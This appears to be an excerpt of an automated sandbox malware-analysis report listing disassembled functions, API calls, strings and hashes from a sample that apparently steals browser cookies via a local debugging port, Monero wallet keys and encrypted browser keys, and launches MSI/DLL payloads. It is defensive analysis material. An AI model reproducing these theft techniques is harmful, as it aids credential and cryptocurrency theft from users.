                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: image/jpeg
                                  • API String ID: 2244384528-3785015651
                                  • Opcode ID: 27b9dc2e9e58a4c15e988d1624bbc1b51a253e7b57f34d212d848ac8868c7fed
                                  • Instruction ID: 6d8795733d2c7e08aa78c9ca40301c6256f56c08684b3202adc91dce6ae6756d
                                  • Opcode Fuzzy Hash: 27b9dc2e9e58a4c15e988d1624bbc1b51a253e7b57f34d212d848ac8868c7fed
                                  • Instruction Fuzzy Hash: 4B71EEB5A14208AFDB14DFE5DC85FEEB7B8BF48700F108548F65AA7290DB74A944CB60
                                  Function 00BB3080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00BB3415
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00BB35AD
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00BB373A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: 3d5b29054da5670355bc47a3ef98a3004a059b9b8ac5a4aa4551be14df1a2622
                                  • Instruction ID: 10e28e27f8310718b6ba80730479b5f5aa21db4f80fde089773ab5c9bbbb1b88
                                  • Opcode Fuzzy Hash: 3d5b29054da5670355bc47a3ef98a3004a059b9b8ac5a4aa4551be14df1a2622
                                  • Instruction Fuzzy Hash: 2A12DA71D10118ABCB18FBA0DDA2FFDB7B9AF14300F4045D9E11666192EFB46B49CBA1
                                  Function 00BA9BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BA9A50: InternetOpenA.WININET(00BC0AF6,00000001,00000000,00000000,00000000), ref: 00BA9A6A
                                  • lstrcat.KERNEL32(?,cookies), ref: 00BA9CAF
                                  • lstrcat.KERNEL32(?,00BC12C4), ref: 00BA9CC1
                                  • lstrcat.KERNEL32(?,?), ref: 00BA9CD5
                                  • lstrcat.KERNEL32(?,00BC12C8), ref: 00BA9CE7
                                  • lstrcat.KERNEL32(?,?), ref: 00BA9CFB
                                  • lstrcat.KERNEL32(?,.txt), ref: 00BA9D0D
                                  • lstrlen.KERNEL32(00000000), ref: 00BA9D17
                                  • lstrlen.KERNEL32(00000000), ref: 00BA9D26
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 3174675846-3542011879
                                  • Opcode ID: c099170279f0b8043e3c2407b2b17c28a8efd5a9eae6e5dba802f84ddddd7528
                                  • Instruction ID: 9ef4b451dddc8a3fc746c50d172e6133ae406b121e584877bd5af5df3213dbdf
                                  • Opcode Fuzzy Hash: c099170279f0b8043e3c2407b2b17c28a8efd5a9eae6e5dba802f84ddddd7528
                                  • Instruction Fuzzy Hash: 575182B5D10508ABCB14EBE4DC95FEE73B8AF05301F404598F21AA7091EF709A88CF61
                                  Function 00BB5510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                    • Part of subcall function 00BA62D0: InternetOpenA.WININET(00BC0DFF,00000001,00000000,00000000,00000000), ref: 00BA6331
                                    • Part of subcall function 00BA62D0: StrCmpCA.SHLWAPI(?,0130EE58), ref: 00BA6353
                                    • Part of subcall function 00BA62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BA6385
                                    • Part of subcall function 00BA62D0: HttpOpenRequestA.WININET(00000000,GET,?,0130E828,00000000,00000000,00400100,00000000), ref: 00BA63D5
                                    • Part of subcall function 00BA62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BA640F
                                    • Part of subcall function 00BA62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BA6421
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BB5568
                                  • lstrlen.KERNEL32(00000000), ref: 00BB557F
                                    • Part of subcall function 00BB8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BB8FE2
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00BB55B4
                                  • lstrlen.KERNEL32(00000000), ref: 00BB55D3
                                  • lstrlen.KERNEL32(00000000), ref: 00BB55FE
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: 5c189d2bd093997c2f514ccbe167a7576746b798385e53ae7f0cbee44c856817
                                  • Instruction ID: ed968ceaa326bc303e70f5e96552f0fbc3849104cd9e1a701027f44fad22b172
                                  • Opcode Fuzzy Hash: 5c189d2bd093997c2f514ccbe167a7576746b798385e53ae7f0cbee44c856817
                                  • Instruction Fuzzy Hash: 3651DB70A10108ABCF24EF64DDA7BFD77B9AF10340F504498E41A67592EFB06B45CB62
                                  Function 00BB1520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 6b537c5227b297e5fca4045d0974d1f889ee5964d7efd236da2cda6f25e22505
                                  • Instruction ID: 03f1fa89c73df4594f72cba29ce2b380ca9e69013da1533ef766f4da94d8ba3a
                                  • Opcode Fuzzy Hash: 6b537c5227b297e5fca4045d0974d1f889ee5964d7efd236da2cda6f25e22505
                                  • Instruction Fuzzy Hash: 01C173B5D00219ABCF14EF60DC99FEE77B9AF54304F0049D8E509A7251DAB0AA85CF91
                                  Function 00BB44D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BB8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BB8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB453C
                                  • lstrcat.KERNEL32(?,0130E840), ref: 00BB455B
                                  • lstrcat.KERNEL32(?,?), ref: 00BB456F
                                  • lstrcat.KERNEL32(?,0130DA58), ref: 00BB4583
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BB8F20: GetFileAttributesA.KERNEL32(00000000,?,00BA1B94,?,?,00BC577C,?,?,00BC0E22), ref: 00BB8F2F
                                    • Part of subcall function 00BAA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BAA489
                                    • Part of subcall function 00BAA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BAA13C
                                    • Part of subcall function 00BAA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BAA161
                                    • Part of subcall function 00BAA110: LocalAlloc.KERNEL32(00000040,?), ref: 00BAA181
                                    • Part of subcall function 00BAA110: ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BAA1AA
                                    • Part of subcall function 00BAA110: LocalFree.KERNEL32(00BA148F), ref: 00BAA1E0
                                    • Part of subcall function 00BAA110: CloseHandle.KERNEL32(000000FF), ref: 00BAA1EA
                                    • Part of subcall function 00BB9550: GlobalAlloc.KERNEL32(00000000,00BB462D,00BB462D), ref: 00BB9563
                                  • StrStrA.SHLWAPI(?,0130E660), ref: 00BB4643
                                  • GlobalFree.KERNEL32(?), ref: 00BB4762
                                    • Part of subcall function 00BAA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4F3E,00000000,00000000), ref: 00BAA23F
                                    • Part of subcall function 00BAA210: LocalAlloc.KERNEL32(00000040,?,?,?,00BA4F3E,00000000,?), ref: 00BAA251
                                    • Part of subcall function 00BAA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4F3E,00000000,00000000), ref: 00BAA27A
                                    • Part of subcall function 00BAA210: LocalFree.KERNEL32(?,?,?,?,00BA4F3E,00000000,?), ref: 00BAA28F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB46F3
                                  • StrCmpCA.SHLWAPI(?,00BC08D2), ref: 00BB4710
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00BB4722
                                  • lstrcat.KERNEL32(00000000,?), ref: 00BB4735
                                  • lstrcat.KERNEL32(00000000,00BC0FA0), ref: 00BB4744
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: e9148c4c0952fc205a57828c2c446c99aa5511fdb144f2c5512261a2030c4630
                                  • Instruction ID: a74e083c9eddc840ffcb4fdf8febffa92b349a84cafba50426d00dfb9e74e9c7
                                  • Opcode Fuzzy Hash: e9148c4c0952fc205a57828c2c446c99aa5511fdb144f2c5512261a2030c4630
                                  • Instruction Fuzzy Hash: F77165B6900208ABDF14EBA0DD95FEE77BDAB88300F0045D8B619A6151EB75DB48CB61
                                  Function 00BA1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BA12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BA12B4
                                    • Part of subcall function 00BA12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00BA12BB
                                    • Part of subcall function 00BA12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BA12D7
                                    • Part of subcall function 00BA12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BA12F5
                                    • Part of subcall function 00BA12A0: RegCloseKey.ADVAPI32(?), ref: 00BA12FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BA134F
                                  • lstrlen.KERNEL32(?), ref: 00BA135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 00BA1377
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BB8CF0: GetSystemTime.KERNEL32(00BC0E1B,0130AA18,00BC05B6,?,?,00BA13F9,?,0000001A,00BC0E1B,00000000,?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BB8D16
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00BA1465
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                    • Part of subcall function 00BAA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BAA13C
                                    • Part of subcall function 00BAA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BAA161
                                    • Part of subcall function 00BAA110: LocalAlloc.KERNEL32(00000040,?), ref: 00BAA181
                                    • Part of subcall function 00BAA110: ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BAA1AA
                                    • Part of subcall function 00BAA110: LocalFree.KERNEL32(00BA148F), ref: 00BAA1E0
                                    • Part of subcall function 00BAA110: CloseHandle.KERNEL32(000000FF), ref: 00BAA1EA
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BA14EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: a5b9750836e0bbebc375724883bdb234b8054bd2ebe9dd622fb9d2edbac18c83
                                  • Instruction ID: 08a79673a46b4928b28496ba7aef5bd7d0092ba78d9a2dda347d13e884df763c
                                  • Opcode Fuzzy Hash: a5b9750836e0bbebc375724883bdb234b8054bd2ebe9dd622fb9d2edbac18c83
                                  • Instruction Fuzzy Hash: A35143B1D501186BCB65FB60DD92FFD73BC9B54300F4045E8B60A62092EE706B89CFA5
                                  Function 00BA9A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetOpenA.WININET(00BC0AF6,00000001,00000000,00000000,00000000), ref: 00BA9A6A
                                  • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00BA9AAB
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA9AC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$Open$CloseHandle
                                  • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                  • API String ID: 3289985339-2144369209
                                  • Opcode ID: 549ffadcf36e62e8bacb8a32497753dfd496d2b9c37b522732d5079c43317e1f
                                  • Instruction ID: be6b30fefedbc89fbb5dbe177e6a39c30d12adab87bc9e45d8755b3a53c5dfaf
                                  • Opcode Fuzzy Hash: 549ffadcf36e62e8bacb8a32497753dfd496d2b9c37b522732d5079c43317e1f
                                  • Instruction Fuzzy Hash: 8D41F775A14218AFDB14EBA4CC95FEE77B8EB48740F1040D9F549AA190DBB0AE84CB60
                                  Function 00BA7630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BA7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BA739A
